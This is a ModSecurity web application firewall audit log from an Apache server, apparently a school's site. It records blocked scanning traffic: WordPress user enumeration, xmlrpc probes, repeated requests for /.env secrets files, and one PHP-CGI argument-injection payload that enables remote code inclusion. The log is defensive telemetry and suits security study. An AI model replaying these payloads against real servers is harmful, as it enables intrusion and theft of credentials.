199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0164e44-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745801113073222 3330 (- - -) Stopwatch2: 1745801113073222 3330; combined=1448, p1=451, p2=968, p3=0, p4=0, p5=29, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0164e44-Z-- --7de5231e-A-- [28/Apr/2025:07:45:15 +0700] aA7Pm1T4soy9XydcuKaj_wAAAEg 103.236.140.4 37076 103.236.140.4 8181 --7de5231e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.63 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.63 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7de5231e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7de5231e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745801115466015 2958 (- - -) Stopwatch2: 1745801115466015 2958; combined=1356, p1=456, p2=871, p3=0, p4=0, p5=29, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7de5231e-Z-- --9f49a403-A-- [28/Apr/2025:07:45:17 +0700] aA7PnVT4soy9XydcuKakAQAAAEk 103.236.140.4 37088 103.236.140.4 8181 --9f49a403-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.63 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.63 X-Forwarded-Proto: http Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9f49a403-C-- demo.sayHello --9f49a403-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f49a403-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745801117826386 6597 (- - -) Stopwatch2: 1745801117826386 6597; combined=4830, p1=577, p2=4044, p3=28, p4=31, p5=87, sr=77, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f49a403-Z-- --340d815e-A-- [28/Apr/2025:07:45:33 +0700] aA7PrcJruAEpaSEZ7DC8tAAAABU 103.236.140.4 37156 103.236.140.4 8181 --340d815e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.63 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.63 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --340d815e-C-- demo.sayHello --340d815e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --340d815e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745801133126635 6676 (- - -) Stopwatch2: 1745801133126635 6676; combined=5056, p1=658, p2=4127, p3=36, p4=41, p5=112, sr=131, sw=82, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --340d815e-Z-- --f4abac4a-A-- [28/Apr/2025:10:17:29 +0700] aA7zScJruAEpaSEZ7DDHVAAAABM 103.236.140.4 44288 103.236.140.4 8181 --f4abac4a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 138.197.196.84 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 138.197.196.84 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --f4abac4a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4abac4a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745810249060376 814 (- - -) Stopwatch2: 1745810249060376 814; combined=360, p1=324, p2=0, p3=0, p4=0, p5=36, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4abac4a-Z-- --f0bae839-A-- [28/Apr/2025:10:53:44 +0700] aA77yGj1i6BJZll4jGO9IQAAAIY 103.236.140.4 52616 103.236.140.4 8181 --f0bae839-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.162 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.162 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --f0bae839-C-- --f0bae839-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0bae839-E-- --f0bae839-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745812424648518 5651 (- - -) Stopwatch2: 1745812424648518 5651; combined=3718, p1=548, p2=3138, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0bae839-Z-- --9c457652-A-- [28/Apr/2025:10:56:31 +0700] aA78b1T4soy9XydcuKavMAAAAEU 103.236.140.4 53292 103.236.140.4 8181 --9c457652-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 159.89.174.87 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 159.89.174.87 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --9c457652-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c457652-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745812591686723 726 (- - -) Stopwatch2: 1745812591686723 726; combined=261, p1=230, p2=0, p3=0, p4=0, p5=30, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c457652-Z-- --6a605951-A-- [28/Apr/2025:11:21:03 +0700] aA8CL1T4soy9XydcuKawhAAAAEY 103.236.140.4 59024 103.236.140.4 8181 --6a605951-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 139.59.143.102 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 139.59.143.102 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --6a605951-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a605951-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745814063449962 962 (- - -) Stopwatch2: 1745814063449962 962; combined=390, p1=349, p2=0, p3=0, p4=0, p5=41, sr=143, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a605951-Z-- --41bcee15-A-- [28/Apr/2025:13:23:45 +0700] aA8e8Wj1i6BJZll4jGPGKQAAAIY 103.236.140.4 60434 103.236.140.4 8181 --41bcee15-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept-Charset: utf-8 --41bcee15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --41bcee15-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745821425646826 821 (- - -) Stopwatch2: 1745821425646826 821; combined=368, p1=328, p2=0, p3=0, p4=0, p5=40, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41bcee15-Z-- --f0e5c506-A-- [28/Apr/2025:13:36:08 +0700] aA8h2FT4soy9XydcuKa3qgAAAFM 103.236.140.4 35230 103.236.140.4 8181 --f0e5c506-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 142.93.143.8 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 142.93.143.8 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --f0e5c506-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0e5c506-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745822168140528 735 (- - -) Stopwatch2: 1745822168140528 735; combined=279, p1=247, p2=0, p3=0, p4=0, p5=32, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0e5c506-Z-- --90d6e057-A-- [28/Apr/2025:15:40:43 +0700] aA8_C4_5LpLtj_OTfS_xcwAAAMQ 103.236.140.4 36554 103.236.140.4 8181 --90d6e057-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.88.89 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.88.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3724.8 Safari/537.36 Accept-Charset: utf-8 --90d6e057-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --90d6e057-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745829643979384 778 (- - -) Stopwatch2: 1745829643979384 778; combined=317, p1=275, p2=0, p3=0, p4=0, p5=41, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --90d6e057-Z-- --a8a8234c-A-- [28/Apr/2025:15:40:50 +0700] aA8_EsJruAEpaSEZ7DDdPQAAABE 103.236.140.4 36584 103.236.140.4 8181 --a8a8234c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 5.39.19.178 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 5.39.19.178 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --a8a8234c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8a8234c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745829650489430 813 (- - -) Stopwatch2: 1745829650489430 813; combined=360, p1=301, p2=0, p3=0, p4=0, p5=58, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8a8234c-Z-- --cf375674-A-- [28/Apr/2025:15:41:09 +0700] aA8_JcJruAEpaSEZ7DDdRQAAAAA 103.236.140.4 36670 103.236.140.4 8181 --cf375674-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.88.89 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.88.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; Moto G (5S) Plus) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 Accept-Charset: utf-8 --cf375674-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cf375674-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745829669869177 873 (- - -) Stopwatch2: 1745829669869177 873; combined=440, p1=403, p2=0, p3=0, p4=0, p5=37, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf375674-Z-- --eab4b833-A-- [28/Apr/2025:16:10:45 +0700] aA9GFVT4soy9XydcuKbADwAAAFE 103.236.140.4 43666 103.236.140.4 8181 --eab4b833-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.172.56.145 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.172.56.145 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --eab4b833-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eab4b833-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745831445444453 805 (- - -) Stopwatch2: 1745831445444453 805; combined=347, p1=309, p2=0, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eab4b833-Z-- --6cfa261a-A-- [28/Apr/2025:16:22:08 +0700] aA9IwFT4soy9XydcuKbAmQAAAEw 103.236.140.4 46298 103.236.140.4 8181 --6cfa261a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.88.89 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.88.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; STK-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --6cfa261a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6cfa261a-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745832128019322 834 (- - -) Stopwatch2: 1745832128019322 834; combined=365, p1=327, p2=0, p3=0, p4=0, p5=38, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6cfa261a-Z-- --82316c14-A-- [28/Apr/2025:16:22:10 +0700] aA9Iwmj1i6BJZll4jGPQDgAAAIM 103.236.140.4 46308 103.236.140.4 8181 --82316c14-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.88.89 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.88.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3889.0 Safari/537.36 Accept-Charset: utf-8 --82316c14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --82316c14-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745832130107629 926 (- - -) Stopwatch2: 1745832130107629 926; combined=446, p1=391, p2=0, p3=0, p4=0, p5=55, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82316c14-Z-- --c8012a63-A-- [28/Apr/2025:17:20:35 +0700] aA9Wc8JruAEpaSEZ7DDlWwAAAAg 103.236.140.4 42770 103.236.140.4 8181 --c8012a63-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 64.226.65.160 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 64.226.65.160 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --c8012a63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8012a63-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745835635108654 847 (- - -) Stopwatch2: 1745835635108654 847; combined=350, p1=317, p2=0, p3=0, p4=0, p5=33, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8012a63-Z-- --bc952f45-A-- [28/Apr/2025:17:38:30 +0700] aA9apsJruAEpaSEZ7DDm-gAAABg 103.236.140.4 47036 103.236.140.4 8181 --bc952f45-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 167.99.210.137 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 167.99.210.137 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --bc952f45-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc952f45-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745836710187557 769 (- - -) Stopwatch2: 1745836710187557 769; combined=285, p1=253, p2=0, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc952f45-Z-- --5defac31-A-- [28/Apr/2025:18:00:03 +0700] aA9fs1T4soy9XydcuKbIvAAAAEc 103.236.140.4 52058 103.236.140.4 8181 --5defac31-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 46.101.111.185 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 46.101.111.185 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --5defac31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5defac31-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745838003115258 909 (- - -) Stopwatch2: 1745838003115258 909; combined=366, p1=325, p2=0, p3=0, p4=0, p5=41, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5defac31-Z-- --42ccf10e-A-- [28/Apr/2025:19:57:44 +0700] aA97SFT4soy9XydcuKbxYgAAAEI 103.236.140.4 43364 103.236.140.4 8181 --42ccf10e-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 206.189.19.19 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 206.189.19.19 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --42ccf10e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --42ccf10e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] 